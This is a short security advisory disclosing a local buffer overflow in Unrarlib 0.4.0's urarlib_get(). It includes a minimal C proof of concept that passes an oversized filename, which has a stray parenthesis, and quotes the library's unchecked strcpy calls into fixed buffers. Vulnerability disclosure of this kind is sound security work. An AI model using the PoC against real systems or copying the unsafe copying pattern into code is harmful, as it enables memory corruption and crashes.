[VulnWatch] Unrarlib 0.4.0 (urarlib_get) Local buffer overflow

[starcadi <starcadi@autistici.org>]

Description:

in file unrarlib.c don't exist the check control of size len filename
passed in function urarlib_get()

POC:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unrarlib.h>

int main() 
{
        char *data_ptr;
        unsigned long data_size;
        char *ovf;

        ovf = (char *) malloc(262);
        memset(ovf, 'A', 260);

        urarlib_get(&data_ptr, &data_size, ovf,
                    "test", "password"))

        // get overflow
        return(0);
}

Source error:

--
char ArcName[255];                        /* RAR archive
..
int urarlib_get(void *output,
                unsigned long *size,
                char *filename,
                void *rarfile,
                char *libpassword)
/* Get a file from a RAR file to the "output" buffer. The UniquE RAR
FileLib
 * does everything from allocating memory, decrypting and unpacking the
file
 * from the archive. TRUE is returned if the file could be successfully
 * extracted, else a FALSE indicates a failure.
 */
{
  BOOL  retcode = FALSE;

#ifdef _DEBUG_LOG
  int  str_offs;                            /* used for debug-strings
*/
  char DebugMsg[500];                       /* used to compose debug msg
*/

  if(debug_log_first_start)
  {
    debug_log_first_start=FALSE;            /* only create a new log
file   */
    debug_init(_DEBUG_LOG_FILE);            /* on startup
*/
  }

#endif

  InitCRC();                                /* init some vars
*/

  strcpy(ArgName, filename);                /* set file(s) to extract
*/
#ifdef _USE_MEMORY_TO_MEMORY_DECOMPRESSION
  MemRARFile = rarfile;                     /* set pointer to mem-RAR
file  */
#else
  strcpy(ArcName, rarfile);                 /* set RAR file name
*/
#endif
--


-- starcadi